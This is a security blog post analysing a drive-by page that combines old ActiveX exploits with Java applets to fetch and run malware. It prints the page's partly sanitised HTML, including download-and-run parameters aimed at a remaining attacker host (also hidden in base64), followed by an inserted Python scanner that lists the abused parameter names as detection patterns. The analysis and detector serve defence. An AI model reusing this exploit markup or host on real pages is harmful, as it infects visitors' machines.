
Zscaler Blog


Remote Downloader ActiveX: Old Exploits, New Malware

JULIEN SOBRIER
April 26, 2010 - 4 minute read

ActiveX is a proprietary Microsoft technology that allows developers to produce reusable software components. The controls run inside the Internet Explorer (IE) web browser and have been a frequent source of security problems over the years, because many developers have shipped insecure ActiveX controls that allow remote code execution when a user visits a malicious web page with IE. This is a very powerful tool for attackers: everything happens in the background with no user interaction, and exploitation can be triggered with only a few lines of code.


I recently stumbled upon a page using no fewer than 8 different ActiveX exploits on the same page:

  • Rediff Bol Downloader ActiveX Control Remote Code Execution Vulnerability (2006, CVE-2006-6838)
  • Office OCX WordViewer.OCX Word Viewer ActiveX Multiple Vulnerabilities (2007, CVE-2007-2496)
  • Symantec AppStream Client 'LaunchObj' ActiveX Control Arbitrary File Download Vulnerability (2008, CVE-2008-4388)
  • Peachtree Accounting 'PAWWeb11.ocx' ActiveX Control Insecure Method Vulnerability (2008)
  • Multiple Office OCX ActiveX Controls 'OpenWebFile()' Arbitrary Program Execution Vulnerability (2009)
It also attempts to download 2 malicious Java applets.

These ActiveX controls attempt to download and install 2 malicious files. One is detected as malware by only 6 out of 40 antivirus engines, the other is detected by 18 antivirus engines.

Below is the source of the page (the malicious CLSIDs and files have been removed):


<html><body><object 
classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="OpenWebFile" 
VALUE="hxxp://xxx/loading.php?spl=ActiveX_pack"></object> 
<object classid="clsid:BBBBBBBB-BBBB-BBBBB-BBBB-BBBBBBBBBBBB"> 
<PARAM NAME="OpenWebFile" 
VALUE="http://xxx/loading.php?spl=ActiveX_pack"> </object> 
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA"> 
<PARAM NAME="OpenWebFile" 
VALUE="http://xxx/loading.php?spl=ActiveX_pack"> </object> 
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA5"> 
<PARAM NAME="OpenWebFile" 
VALUE="http://ally.serveblog.net//loading.php?spl=ActiveX_pack"> </object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="installAppMgr" 
VALUE="http://xxx/loading.php?spl=ActiveX_pack"></object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="PerformUpdateAsync" 
VALUE="http://xxx/loading.php?spl=ActiveX_pack"></object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="ExecutePreferredApplication" 
VALUE="http://xxx/loading.php?spl=ActiveX_pack"></object>
<OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0" 
CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" 
CODEBASE="http://xxx/DownloaderActiveX.cab#Version=1,0,0,1"> 
<PARAM NAME="propProgressbackground" VALUE="#bccee8"> 
<PARAM NAME="propTextbackground" VALUE="#f7f8fc"> 
<PARAM NAME="propBarColor" VALUE="#df0203"> 
<PARAM NAME="propTextColor" VALUE="#000000"> 
<PARAM NAME="propWidth" VALUE="0"> 
<PARAM NAME="propHeight" VALUE="0"> 
<PARAM NAME="propDownloadUrl" 
VALUE="http://xxx/loading.php?spl=ActiveX_pack">
<PARAM NAME="propPostdownloadAction" VALUE="run">
<PARAM NAME="propInstallCompleteUrl" VALUE=""> 
<PARAM NAME="propbrowserRedirectUrl" VALUE=""> 
<PARAM NAME="propVerbose" VALUE="0"> 
<PARAM NAME="propInterrupt" VALUE="0"> </OBJECT> 
<OBJECT id="sysWIN" WIDTH=1 HEIGHT=1 
classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA" 
codebase="http://xxx/Bol.CAB"></OBJECT>
 
<script language="vbscript">
sysWIN.url = "http://xxx/loading.php?spl=ActiveX_pack"
sysWIN.fontsize = 10
sysWIN.barcolor = 00FF00
sysWIN.start = "start"</script>
<applet code="sklif.Hieeyfc.class" archive="j1_ke.jar" width="480" 
height="200"> 
<param name="data" VALUE="http://xxx/loading.php?spl=javadnwa&"> 
<param name="cc" value="1"> </applet> 
<applet width="100%" height="100%" code="Uutecwv" archive="j2_93.jar"> 
<param name="site" 
VALUE="aHR0cDovL2FsbHkuc2VydmVibG9nLm5ldC8vbG9hZGluZy5waHA/c3BsPWphdmFkbndiJg=="> 
</applet>
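Every exploit on that page follows the same shape: an <object> with a vendor CLSID and a single "method" PARAM (OpenWebFile, installAppMgr, PerformUpdateAsync, ExecutePreferredApplication, propDownloadUrl) whose value is the download URL, plus an applet whose URL is hidden in a base64 PARAM. The following static scanner is an added example written for this post (not Zscaler's code); it extracts those patterns from a constructed sample page with a placeholder host, and also handles the base64-encoded applet parameter.

```python
import base64, re
from html.parser import HTMLParser
# PARAM names the page above abuses as "fetch this URL and run it".
INSECURE_PARAMS = {"openwebfile", "installappmgr", "performupdateasync",
                   "executepreferredapplication", "propdownloadurl"}
URL_RE = re.compile(r"^(?:hxxp|http|ftp)s?://", re.I)

class ActiveXScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.elements, self._current = [], None  # <object>/<applet> elements with their params
    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}  # html.parser lower-cases tag/attr names
        if tag in ("object", "applet"):
            self._current = {"tag": tag, "attrs": attrs, "params": {}}
            self.elements.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current["params"][attrs.get("name", "").lower()] = attrs.get("value", "")
    def handle_endtag(self, tag):
        if tag in ("object", "applet"):
            self._current = None

def decoded_url(value):
    """Return the URL hidden in a base64 PARAM value (the applet trick above), else None."""
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except ValueError:  # not base64, or does not decode to text
        return None
    return text if URL_RE.match(text) else None

def scan(html):
    """Return (tag, classid, reason, url) findings for the exploit-pack patterns in html."""
    parser, findings = ActiveXScanner(), []
    parser.feed(html)
    for el in parser.elements:
        tag, clsid = el["tag"], el["attrs"].get("classid", "")
        for name, value in el["params"].items():
            if name in INSECURE_PARAMS and URL_RE.match(value):
                findings.append((tag, clsid, "param " + name, value))
            elif (url := decoded_url(value)) is not None:
                findings.append((tag, clsid, "base64 param " + name, url))
    return findings

# Constructed sample modelled on the snippet above; "malware.example" is a placeholder host.
SAMPLE = """<html><body>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="OpenWebFile" VALUE="hxxp://malware.example/loading.php?spl=ActiveX_pack"></object>
<OBJECT CLASSID="CLSID:BBBBBBBB-BBBB-BBBB-BBBB-BBBBBBBBBBBB" WIDTH="0" HEIGHT="0">
<PARAM NAME="propWidth" VALUE="0"><PARAM NAME="propDownloadUrl" VALUE="http://malware.example/x.php"></OBJECT>
<applet code="Loader.class" archive="j2.jar">
<param name="site" VALUE="aHR0cDovL21hbHdhcmUuZXhhbXBsZS9sb2FkaW5nLnBocA=="></applet></body></html>"""
```

Running `scan(SAMPLE)` yields three findings (two download-method PARAMs and the decoded applet URL); cosmetic PARAMs such as propWidth are ignored.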


It is interesting to see that this page uses fairly old, and relatively well known, browser exploits together with state-of-the-art malware that is virtually invisible to most antivirus software. Some people have argued that desktop antivirus protection alone is good enough, because the exploit is just a means of delivering the malicious payload, and stopping this payload is all you need to do in order to be protected. However, relying on a single layer of security is very risky. Catching the exploit can sometimes be easier than catching the payload, so you really need to take a defense-in-depth approach to security: patch your software, detect exploits, and detect malicious payloads.

-- Julien